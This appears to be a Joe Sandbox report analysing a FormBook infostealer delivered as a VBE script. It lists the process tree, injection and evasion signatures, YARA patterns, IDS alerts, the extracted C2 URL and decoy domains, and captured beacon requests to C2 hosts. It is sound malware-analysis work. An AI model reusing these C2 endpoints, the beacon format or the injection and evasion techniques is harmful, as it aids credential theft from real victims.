Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TNS71092E68UI0.vbe

Overview

General Information

Sample name:TNS71092E68UI0.vbe
Analysis ID:1482976
MD5:83ef588dc92a85ef93d055290393a07d
SHA1:c7fa54bb9f8d5467137197b8e344b95d2e1f4430
SHA256:02500b9058612028c5667bfd9302d81184689fcb88eb5500902d39baec246fa0
Tags:FormbookTNTvbe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4396 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HHhHh.exe (PID: 6728 cmdline: "C:\Users\user\AppData\Local\Temp\HHhHh.exe" MD5: 62FA567CBB7227AEB7755B679D780725)
      • HHhHh.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\HHhHh.exe" MD5: 62FA567CBB7227AEB7755B679D780725)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • wscript.exe (PID: 1632 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 6696 cmdline: /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.happygreenfarm.com/de94/"], "decoy": ["way2future.net", "worldnewsdailys.online", "rendamaisbr.com", "s485.icu", "vcxwpo.xyz", "imagivilleartists.com", "herbatyorganics.com", "xn--80ado1abokv5d.xn--p1acf", "invigoratewell.com", "especialistaleitura.online", "pkrstg.com", "performacaretechnical.com", "dreamgame55.net", "hkitgugx.xyz", "istanlikbilgiler.click", "slotter99j.vip", "exploringtheoutdoors.net", "triberoots.com", "energiaslotsbet.com", "dkforcm.com", "rtp1kijangwin.top", "monkeytranslate.com", "21stcut.shop", "hgty866.xyz", "shaktitest.site", "monrocasino-508.com", "level4d1.bet", "nbcze.com", "rtproketslotcsn.art", "xjps.ltd", "yoanamod.com", "gv031.net", "mceliteroofing.com", "1wtrh.com", "online-dating-24966.bond", "dentalbrasstacks.com", "kf7wzmuzv0w.xyz", "gyosei-arimura.com", "shopyzones.shop", "bradleyboy.xyz", "bradleyboy.xyz", "nownzen.store", "buysellrepresent.com", "tateshades.xyz", "club1stclass.com", "2309238042.com", "ashleymorgan.live", "xn--pdr89n.vip", "princecl.xyz", "mindfulmanifest.net", "c4ads.net", "exlith.com", "jiogskeojg.xyz", "lxrtl.com", "cshark-sguser.com", "h021b.rest", "alfiethorhalls.com", "librosinfantiles.top", "alazamexports.com", "mehalhouse.com", "slvtapeworld.com", "mybest.engineer", "legalix.xyz", "kuuichi.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.HHhHh.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.HHhHh.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.HHhHh.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          4.2.HHhHh.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.2.HHhHh.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", ProcessId: 4396, ProcessName: wscript.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", ProcessId: 4396, ProcessName: wscript.exe

          Snort Signatures

          No Snort rule has matched

          Suricata Signatures

          Timestamp:2024-07-26T13:07:33.006686+0200
          SID:2031453
          Source Port:49725
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T13:06:31.117213+0200
          SID:2031453
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T13:03:59.789400+0200
          SID:2022930
          Source Port:443
          Destination Port:49717
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T13:04:29.975873+0200
          SID:2031453
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T13:03:47.731358+0200
          SID:2527003
          Source Port:80
          Destination Port:49716
          Protocol:TCP
          Classtype:Misc Attack
          Timestamp:2024-07-26T13:03:48.249330+0200
          SID:2031453
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T13:02:59.626273+0200
          SID:2031453
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T13:03:21.583205+0200
          SID:2022930
          Source Port:443
          Destination Port:49709
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T13:06:10.664892+0200
          SID:2031453
          Source Port:49722
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T13:05:50.281197+0200
          SID:2031453
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeAvira: detection malicious, Label: HEUR/AGEN.1357443
          Found malware configuration
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.happygreenfarm.com/de94/"], "decoy": ["way2future.net", "worldnewsdailys.online", "rendamaisbr.com", "s485.icu", "vcxwpo.xyz", "imagivilleartists.com", "herbatyorganics.com", "xn--80ado1abokv5d.xn--p1acf", "invigoratewell.com", "especialistaleitura.online", "pkrstg.com", "performacaretechnical.com", "dreamgame55.net", "hkitgugx.xyz", "istanlikbilgiler.click", "slotter99j.vip", "exploringtheoutdoors.net", "triberoots.com", "energiaslotsbet.com", "dkforcm.com", "rtp1kijangwin.top", "monkeytranslate.com", "21stcut.shop", "hgty866.xyz", "shaktitest.site", "monrocasino-508.com", "level4d1.bet", "nbcze.com", "rtproketslotcsn.art", "xjps.ltd", "yoanamod.com", "gv031.net", "mceliteroofing.com", "1wtrh.com", "online-dating-24966.bond", "dentalbrasstacks.com", "kf7wzmuzv0w.xyz", "gyosei-arimura.com", "shopyzones.shop", "bradleyboy.xyz", "bradleyboy.xyz", "nownzen.store", "buysellrepresent.com", "tateshades.xyz", "club1stclass.com", "2309238042.com", "ashleymorgan.live", "xn--pdr89n.vip", "princecl.xyz", "mindfulmanifest.net", "c4ads.net", "exlith.com", "jiogskeojg.xyz", "lxrtl.com", "cshark-sguser.com", "h021b.rest", "alfiethorhalls.com", "librosinfantiles.top", "alazamexports.com", "mehalhouse.com", "slvtapeworld.com", "mybest.engineer", "legalix.xyz", "kuuichi.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: TNS71092E68UI0.vbeVirustotal: Detection: 16%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeJoe Sandbox ML: detected
          Source: Binary string: wntdll.pdb source: HHhHh.exe, wscript.exe
          Source: Binary string: wscript.pdb source: wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_009C23CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,6_2_009C23CE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4x nop then pop ebx4_2_00407B20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop ebx6_2_00907B20

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.169.142.0 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.242 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.happygreenfarm.com/de94/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.tateshades.xyz
          Source: DNS query: www.legalix.xyz
          Source: global trafficHTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn HTTP/1.1Host: www.tateshades.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx HTTP/1.1Host: www.gyosei-arimura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 HTTP/1.1Host: www.ashleymorgan.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx HTTP/1.1Host: www.rendamaisbr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=2R5LA04AgrrHOF4dber2AYa+4EXsdsXp9ugXIfcwTjx7QxDViEac/VVT3dt/yVkMwVF8 HTTP/1.1Host: www.especialistaleitura.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.169.142.0 103.169.142.0
          Source: Joe Sandbox ViewIP Address: 198.54.117.242 198.54.117.242
          Source: Joe Sandbox ViewASN Name: MTSRU MTSRU
          Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 5_2_11269F82 getaddrinfo,setsockopt,recv,5_2_11269F82
          Source: global trafficHTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn HTTP/1.1Host: www.tateshades.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx HTTP/1.1Host: www.gyosei-arimura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 HTTP/1.1Host: www.ashleymorgan.liveConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx HTTP/1.1Host: www.rendamaisbr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=2R5LA04AgrrHOF4dber2AYa+4EXsdsXp9ugXIfcwTjx7QxDViEac/VVT3dt/yVkMwVF8 HTTP/1.1Host: www.especialistaleitura.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.tateshades.xyz
          Source: global trafficDNS traffic detected: DNS query: www.gyosei-arimura.com
          Source: global trafficDNS traffic detected: DNS query: www.ashleymorgan.live
          Source: global trafficDNS traffic detected: DNS query: www.gv031.net
          Source: global trafficDNS traffic detected: DNS query: www.rendamaisbr.com
          Source: global trafficDNS traffic detected: DNS query: www.especialistaleitura.online
          Source: global trafficDNS traffic detected: DNS query: www.rtproketslotcsn.art
          Source: global trafficDNS traffic detected: DNS query: www.exploringtheoutdoors.net
          Source: global trafficDNS traffic detected: DNS query: www.invigoratewell.com
          Source: global trafficDNS traffic detected: DNS query: www.legalix.xyz
          Source: global trafficDNS traffic detected: DNS query: www.21stcut.shop
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:05:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAbLK1QdlRV6LTBnBQHP4GMtosATTCpVjiz%2F%2B8enYj6c8u0AHIppOl0xFo2qiVuQVaotmCVNuMU9HCRRoMoShzJFVrl5VcK8YiriQ5ZaRymFb5cMcNjDMhOkipfaQtZ83MDb%2F%2FPM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ea39e95042c0-EWRalt-svc: h3=":443"; ma=86400Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>0

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041A360 NtCreateFile,4_2_0041A360
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exeCode function: 4_2_0041A410 NtReadFile,4_2_0041A410
